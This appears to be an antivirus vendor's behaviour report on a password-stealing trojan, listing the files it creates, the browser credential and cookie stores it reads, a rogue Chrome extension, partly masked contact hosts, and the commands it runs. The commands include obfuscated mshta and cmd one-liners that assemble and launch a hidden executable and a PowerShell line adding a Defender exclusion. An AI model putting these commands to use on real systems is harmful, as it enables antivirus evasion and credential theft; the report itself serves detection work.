Trojan.PWS.Steam.20866

Technical Information

To ensure autorun and distribution

Creates or modifies the following files

<SYSTEM32>\tasks\firefox default browser agent 3a686191b999f221

Malicious functions

Executes the following

'%WINDIR%\syswow64\taskkill.exe' /f /im chrome.exe
'%WINDIR%\syswow64\taskkill.exe' /F -Im "Sat069aa332ee.exe"

Reads files which store third party applications passwords

%LOCALAPPDATA%\google\chrome\user data\default\cookies
%LOCALAPPDATA%\google\chrome\user data\default\login data
%APPDATA%\mozilla\firefox\profiles.ini

Modifies file system

Creates the following files

%TEMP%\7zsc21292b4\libcurl.dll
%LOCALAPPDATA%\google\chrome\user data\default\extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\js\mode-ecb.js
%LOCALAPPDATA%\google\chrome\user data\default\extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\js\pad-nopadding.js
%LOCALAPPDATA%\google\chrome\user data\default\extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\manifest.json
%TEMP%\09xu.exe
%TEMP%\20l2vno.2
%TEMP%\guvil5.sch
%TEMP%\7zsc21292b4\sat065565d97bdb397f.exe
%TEMP%\7tcinejp.0
%TEMP%\scmeap.su
%TEMP%\1421808.dat
%TEMP%\1421933.dat
%TEMP%\1421949.dat
%TEMP%\cookies.sqlite
%TEMP%\cookies.sqlite-shm
%LOCALAPPDATA%\google\chrome\user data\default\extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\js\content.js
%LOCALAPPDATA%\google\chrome\user data\default\extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\js\jquery-3.3.1.min.js
%LOCALAPPDATA%\google\chrome\user data\default\extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\js\background.js
%LOCALAPPDATA%\google\chrome\user data\default\extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\js\aes.js
%LOCALAPPDATA%\google\chrome\user data\default\extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\icon.png
%TEMP%\7zsc21292b4\libgcc_s_dw2-1.dll
%TEMP%\7zsc21292b4\libstdc++-6.dll
%TEMP%\7zsc21292b4\libwinpthread-1.dll
%TEMP%\7zsc21292b4\sat060d4c1d8966603.exe
%TEMP%\7zsc21292b4\sat061ebc31983b2a6.exe
%TEMP%\7zsc21292b4\sat062c5c35feeb2ae3.exe
%TEMP%\r6f7se.i
%TEMP%\ykifdqa.1
%TEMP%\7zsc21292b4\sat064ebfde9202a51.exe
%TEMP%\7zsc21292b4\sat069aa332ee.exe
%TEMP%\7zsc21292b4\sat06a11847aa7bcad.exe
%TEMP%\7zsc21292b4\sat06de08ebdf485e3e.exe
%TEMP%\7zsc21292b4\sat06e5ca396614709b.exe
%TEMP%\7zsc21292b4\setup_install.exe
%LOCALAPPDATA%\google\chrome\user data\default\extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\background.html
%TEMP%\7zsc21292b4\libcurlpp.dll
%TEMP%\7zsc21292b4\sat067e5398adc5f8099.exe
%APPDATA%\sftvvtv

Sets the 'hidden' attribute to the following files

%APPDATA%\sftvvtv

Deletes the following files

%TEMP%\1421808.dat
%TEMP%\1421933.dat
%TEMP%\1421949.dat
%TEMP%\cookies.sqlite-shm
%TEMP%\cookies.sqlite
%TEMP%\7zsc21292b4\sat067e5398adc5f8099.exe

Modifies the following files

%LOCALAPPDATA%\google\chrome\user data\default\secure preferences

Network activity

Connects to

'45.##3.1.182':80
'ni###nnbest.me':443
'microsoft.com':80
'cd#.##scordapp.com':443
'ip##pi.com':80
'cd#.##scordapp.com':80
'21#.#93.30.21':80
'wf###agon.ru':80
'iy##ian.com':80
'pa###bin.com':443
'45.##3.1.107':80
'ma#.to':443
'ip###ger.org':443
't.###amec.com':443
'localhost':49177
'localhost':49175
'13#.#81.129.119':4805
'45.#.20.13':80

TCP

HTTP GET requests

http://45.##3.1.107/server.txt
http://45.##3.1.107/index.html
http://wf###agon.ru/api/setStats.php
http://21#.#93.30.21/base/api/statistics.php
http://ip##pi.com/json/
http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt

Other

'localhost':49175
'localhost':49177
't.###amec.com':443
'localhost':49178
'ip###ger.org':443
'ma#.to':443
'pa###bin.com':443
'cd#.##scordapp.com':80
'cd#.##scordapp.com':443
'ni###nnbest.me':443

UDP

DNS ASK t.###amec.com
DNS ASK al######le-pa1ments.com.mx
DNS ASK ni###nnbest.me
DNS ASK st#####mg.youtuuee.com
DNS ASK microsoft.com
DNS ASK to#####annpickshop.cc
DNS ASK cd#.##scordapp.com
DNS ASK ip##pi.com
DNS ASK wf###agon.ru
DNS ASK iy##ian.com
DNS ASK pa###bin.com
DNS ASK gg##cl.biz
DNS ASK ma#.to
DNS ASK ip###ger.org
DNS ASK li###ncode.com
DNS ASK hs##ns.xyz
DNS ASK bu######asy-football.com.sg
DNS ASK gm###ple.com

Miscellaneous

Searches for the following windows

ClassName: 'ConsoleWindowClass' WindowName: ''
ClassName: 'EDIT' WindowName: ''
ClassName: '' WindowName: ''
ClassName: 'Chrome_MessageWindow' WindowName: '%LOCALAPPDATA%\Google\Chrome\User Data'

Creates and executes the following

'%TEMP%\7zsc21292b4\setup_install.exe'
'%TEMP%\7zsc21292b4\sat061ebc31983b2a6.exe'
'%TEMP%\09xu.exe' -pPtzyIkqLZoCarb5ew
'%TEMP%\7zsc21292b4\sat067e5398adc5f8099.exe'
'%TEMP%\7zsc21292b4\sat06a11847aa7bcad.exe'
'%TEMP%\7zsc21292b4\sat062c5c35feeb2ae3.exe'
'%TEMP%\7zsc21292b4\sat065565d97bdb397f.exe' /mixone
'%TEMP%\7zsc21292b4\sat06de08ebdf485e3e.exe'
'%TEMP%\7zsc21292b4\sat064ebfde9202a51.exe'
'%TEMP%\7zsc21292b4\sat060d4c1d8966603.exe'
'%TEMP%\7zsc21292b4\sat06e5ca396614709b.exe'
'%TEMP%\7zsc21292b4\sat069aa332ee.exe'
'%WINDIR%\syswow64\cmd.exe' /c copy /y "%TEMP%\7zSC21292B4\Sat069aa332ee.exe" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "%TEMP%\7zSC21292B4\Sat069aa33...' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /c copy /y "%TEMP%\09xU.exE" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "%TEMP%\09xU.exE") do ...' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH +7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART con...' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /c taskkill /f /im chrome.exe' (with hidden window)
'%WINDIR%\syswow64\rundll32.exe' Shell32.dll,Control_RunDLL .\R6f7sE.I' (with hidden window)

Executes the following

'%WINDIR%\syswow64\cmd.exe' /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "%LOCALAPPDATA%\Temp"
'%WINDIR%\syswow64\control.exe' .\R6f7sE.I
'%WINDIR%\syswow64\cmd.exe' /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"
'%WINDIR%\syswow64\cmd.exe' /S /D /c" eCHO "
'%WINDIR%\syswow64\cmd.exe' /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH +7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART con...
'%WINDIR%\syswow64\mshta.exe' vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & Co...
'%WINDIR%\syswow64\cmd.exe' /c copy /y "%TEMP%\09xU.exE" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "%TEMP%\09xU.exE") do ...
'%WINDIR%\syswow64\mshta.exe' VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""%TEMP%\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew ...
'%ProgramFiles(x86)%\google\chrome\application\chrome.exe'
'%WINDIR%\syswow64\cmd.exe' /c copy /y "%TEMP%\7zSC21292B4\Sat069aa332ee.exe" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "%TEMP%\7zSC21292B4\Sat069aa33...
'%WINDIR%\syswow64\cmd.exe' /c taskkill /f /im chrome.exe
'%WINDIR%\syswow64\rundll32.exe' Shell32.dll,Control_RunDLL .\R6f7sE.I
'%WINDIR%\syswow64\mshta.exe' VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""%TEMP%\7zSC21292B4\Sat069aa332ee.exe"" 09xU.exE && STarT 09xU.EXE ...
'%WINDIR%\syswow64\cmd.exe' /c Sat065565d97bdb397f.exe /mixone
'%WINDIR%\syswow64\cmd.exe' /c Sat069aa332ee.exe
'%WINDIR%\syswow64\cmd.exe' /c Sat06a11847aa7bcad.exe
'%WINDIR%\syswow64\cmd.exe' /c Sat061ebc31983b2a6.exe
'%WINDIR%\syswow64\cmd.exe' /c Sat06e5ca396614709b.exe
'%WINDIR%\syswow64\cmd.exe' /c Sat062c5c35feeb2ae3.exe
'%WINDIR%\syswow64\cmd.exe' /c Sat06de08ebdf485e3e.exe
'%WINDIR%\syswow64\cmd.exe' /c Sat064ebfde9202a51.exe
'%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "%LOCALAPPDATA%\Temp"
'%WINDIR%\syswow64\cmd.exe' /c Sat060d4c1d8966603.exe
'%WINDIR%\syswow64\cmd.exe' /c Sat067e5398adc5f8099.exe
'<SYSTEM32>\rundll32.exe' Shell32.dll,Control_RunDLL .\R6f7sE.I

Технологии

Термины

Обучение и просвещение

Мифы

Technical Information

Рекомендации по лечению

Демо бесплатно на 14 дней